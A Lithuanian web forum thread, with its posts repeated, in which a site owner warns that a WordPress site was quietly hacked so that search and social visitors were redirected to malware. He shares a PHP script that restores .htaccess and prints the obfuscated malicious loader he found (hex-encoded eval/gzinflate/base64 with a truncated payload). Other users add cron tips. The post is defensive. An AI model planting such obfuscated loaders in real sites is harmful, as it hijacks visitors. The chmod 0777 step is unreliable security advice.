Įspėjimas dėl nepastebimai nulaužtų svetainių ir kaip išspręsti bėdą

Sveiki,

buvo nulaužta svetainė, o bėdą išspręsti nebuvo labai lengva, ir pats nulaužimas buvo neakivaizdus, pastebėjau tik po kurio laiko, taigi sukuriu temą, kad įspėti uždarbiečius ir svečius pasitikrinti visas turimas svetaines, taip pat, patarimai greičiau sutvarkant problemą. Straipsnyje yra daug kodo, taigi dėl ilgio čia jo viso nedėsiu, pilna versija yra čia: http://teisininkai.info/165/ispejimas-del-nepastebimai-nulauztu-svetainiu-ir-kaip-isspresti-beda/

Kadangi visas straipsnis yra linke, čia jo nekopijuoju, o papildau, kas ten nebuvo paminėta, tačiau gali būti naudinga:

Svetainė: Wordpress naujausia versija, tema ne piratinė, hostingas - Hostex.

Kažkur turbūt yra paliktas kenkėjiškas kodas, kuris reguliariai pakeičia

.htaccess failo turinį, pridėdamas nukreipimus į neužkraunamą svetainę

(turbūt ten buvo/yra malware), jei žmogus ateina iš google, facebook ir

t.t., taigi tiesiai einant net nesimato, kad kažkas blogai, o iš paieškos

žmonės jau nebepatenka.

Beje, pridėjus nukreipiantį kodą, pakeičiami ir .htaccess failo permisions

į -r -r -r.

Laikinai pasirašiau php skriptelį, kad nereikėtų rankom vis trint kodo,

tačiau reikia vis paleidinėtį jį, kad suveiktų

<?php

chmod(".htaccess", 0777);  // octal; correct value of mode

$myFile = ".htaccess";
$fh = fopen($myFile, 'w') or die("can't open file");

$stringData = "
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress";

fwrite($fh, $stringData);

fclose($fh);

?> 

Kenkėjiškas kodas atrodė taip:

<?php
preg_replace("/.*/e","\x65\x76\x61\x6c\x20\x28\x20\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65\x20\x28\x20\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x20\x28'5b1rdxrH0ij82Xut/R9aE3YGYoQA2d4OEli2LNlybMnRxXYs+ZABBphoYMjMIKQ4+u+nqvoy3XNByEme5z3rVWIJuqurq2/V1VXV1aV+4AchazPru8HwsbX173+VBu7Qmftxdx65Xec35xoy43Du6ln9sRNGbgw59kdvOggW0Xqj+bhhI4wzj8fdmRNFiNRA6PRjL5hioX3Pd6N3zhQL/PtfO97U6wK6su2GYRB2/WBkVw/P3r6tbOmZkNwlgMiu1s2siXPdda/d/hwr6MbexJUgkE3fu7438eJykjhxRl6/+/s8iN2oG86nCCSygV5v6pbtjydH3Q97xycHR4d2ldnN2mO7QgR7w/IojWI065crFfb13/96MJxPeUsBQRSH3izynWjsRuWSE4bODQd6ELrxPJwyL+pSqsp8xugDYJ8RCToGIEOCtVgeaiDvwS38K3XfH5

[... - ištryniau kelias dešimtis eilučių, nes postas labai ilgas išėjo, jei kam įdomu, parašysiu :) ]


/oh9UX29TpHPkKn2U75wx9d3l+kC8jwBZ5HJooUuPEQnsNNIiaI8SadAWifuP2D6TCwuSdaWgnqCM3EMmrSzeo7vt/Fc3cXSxWBoi8burj+Xw=='\x29\x29\x20\x29\x20\x3b",".");?> 

Visą veiksmų eigą ir kaip išprendžiau bėdą prašau skaityti čia:

http://teisininkai.info/165/ispejimas-del-nepastebimai-nulauztu-svetainiu-ir-kaip-isspresti-beda/

:)

Sveiki,

 

buvo nulaužta svetainė, o bėdą išspręsti nebuvo labai lengva, ir pats nulaužimas buvo neakivaizdus, pastebėjau tik po kurio laiko, taigi sukuriu temą, kad įspėti uždarbiečius ir svečius pasitikrinti visas turimas svetaines, taip pat, patarimai greičiau sutvarkant problemą. Straipsnyje yra daug kodo, taigi dėl ilgio čia jo viso nedėsiu, pilna versija yra čia: http://teisininkai.info/165/ispejimas-del-nepastebimai-nulauztu-svetainiu-ir-kaip-isspresti-beda/

 

Kadangi visas straipsnis yra linke, čia jo nekopijuoju, o papildau, kas ten nebuvo paminėta, tačiau gali būti naudinga:

 

 

Svetainė: Wordpress naujausia versija, tema ne piratinė, hostingas - Hostex.

 

Kažkur turbūt yra paliktas kenkėjiškas kodas, kuris reguliariai pakeičia

.htaccess failo turinį, pridėdamas nukreipimus į neužkraunamą svetainę

(turbūt ten buvo/yra malware), jei žmogus ateina iš google, facebook ir

t.t., taigi tiesiai einant net nesimato, kad kažkas blogai, o iš paieškos

žmonės jau nebepatenka.

Beje, pridėjus nukreipiantį kodą, pakeičiami ir .htaccess failo permisions

į -r -r -r.

 

 

Laikinai pasirašiau php skriptelį, kad nereikėtų rankom vis trint kodo,

tačiau reikia vis paleidinėtį jį, kad suveiktų

 

<?php

 

chmod(".htaccess", 0777); // octal; correct value of mode

 

$myFile = ".htaccess";

$fh = fopen($myFile, 'w') or die("can't open file");

 

$stringData = "

# BEGIN WordPress

<IfModule mod_rewrite.c>

RewriteEngine On

RewriteBase /

RewriteRule ^index\.php$ - [L]

RewriteCond %{REQUEST_FILENAME} !-f

RewriteCond %{REQUEST_FILENAME} !-d

RewriteRule . /index.php [L]

</IfModule>

# END WordPress";

 

fwrite($fh, $stringData);

 

fclose($fh);

 

?>

 

 

 

Kenkėjiškas kodas atrodė taip:

 

<?php

preg_replace("/.*/e","\x65\x76\x61\x6c\x20\x28\x20\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65\x20\x28\x20\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x20\x28'5b1rdxrH0ij82Xut/R9aE3YGYoQA2d4OEli2LNlybMnRxXYs+ZABBphoYMjMIKQ4+u+nqvoy3XNByEme5z3rVWIJuqurq2/V1VXV1aV+4AchazPru8HwsbX173+VBu7Qmftxdx65Xec35xoy43Du6ln9sRNGbgw59kdvOggW0Xqj+bhhI4wzj8fdmRNFiNRA6PRjL5hioX3Pd6N3zhQL/PtfO97U6wK6su2GYRB2/WBkVw/P3r6tbOmZkNwlgMiu1s2siXPdda/d/hwr6MbexJUgkE3fu7438eJykjhxRl6/+/s8iN2oG86nCCSygV5v6pbtjydH3Q97xycHR4d2ldnN2mO7QgR7w/IojWI065crFfb13/96MJxPeUsBQRSH3izynWjsRuWSE4bODQd6ELrxPJwyL+pSqsp8xugDYJ8RCToGIEOCtVgeaiDvwS38K3XfH5

 

[... - ištryniau kelias dešimtis eilučių, nes postas labai ilgas išėjo, jei kam įdomu, parašysiu :) ]

 

 

/oh9UX29TpHPkKn2U75wx9d3l+kC8jwBZ5HJooUuPEQnsNNIiaI8SadAWifuP2D6TCwuSdaWgnqCM3EMmrSzeo7vt/Fc3cXSxWBoi8burj+Xw=='\x29\x29\x20\x29\x20\x3b",".");?>

 

 

Visą veiksmų eigą ir kaip išprendžiau bėdą prašau skaityti čia:

http://teisininkai.info/165/ispejimas-del-nepastebimai-nulauztu-svetainiu-ir-kaip-isspresti-beda/

:)

Kad nereiktų kartas nuo karto paleidinėti, uždėk cronjob'ą pvz kas valandą ir tegul jis paleidžia tavo php skriptuką :)

Kad nereiktų kartas nuo karto paleidinėti, uždėk cronjob'ą pvz kas valandą ir tegul jis paleidžia tavo php skriptuką :)

Apie tai pagalvojau, tik anksčiau niekad nesusidūriau su jais, ir kaip supratau, Hostex leidžia tik tam tikrą valandą ir minutę paleisti, o ne kas kažkiek laiko, tai reikėtų daug cronjobų kurti, kad nuolat būtų paleidinėjama :) Reikės man jais plačiau pasidomėti.

Apie tai pagalvojau, tik anksčiau niekad nesusidūriau su jais, ir kaip supratau, Hostex leidžia tik tam tikrą valandą ir minutę paleisti, o ne kas kažkiek laiko, tai reikėtų daug cronjobų kurti, kad nuolat būtų paleidinėjama :) Reikės man jais plačiau pasidomėti.

Na kad ne.. Nustatyk 0 * * * * ir bus kiekvieną valandą 0min.

Na kad ne.. Nustatyk 0 * * * * ir bus kiekvieną valandą 0min.

Dėkui, o ką rašyti į laukelį "Komanda" ir "Siųsti Crontab žinutes adresu"?

Ir kaip dažnai galima kartoti užduotį (kas sekundę ar pan.)?

Dėkui, o ką rašyti į laukelį "Komanda" ir "Siųsti Crontab žinutes adresu"?

Ir kaip dažnai galima kartoti užduotį (kas sekundę ar pan.)?

Laukelyje komanda nurodyk php script'ą, kuris bus vykdomas. Čia jau aš nelabai žinau, bet jeigu script'as pasiekiamas iš išorės, tai gali naudoti wget

wget http://google.lt/

Siųsti Crontab žinutes palik tuščią.

Dar gali jei lynx leidzia naudoti: 0 * * * * lynx -dump http://tavo.adresas/iki/skripto.php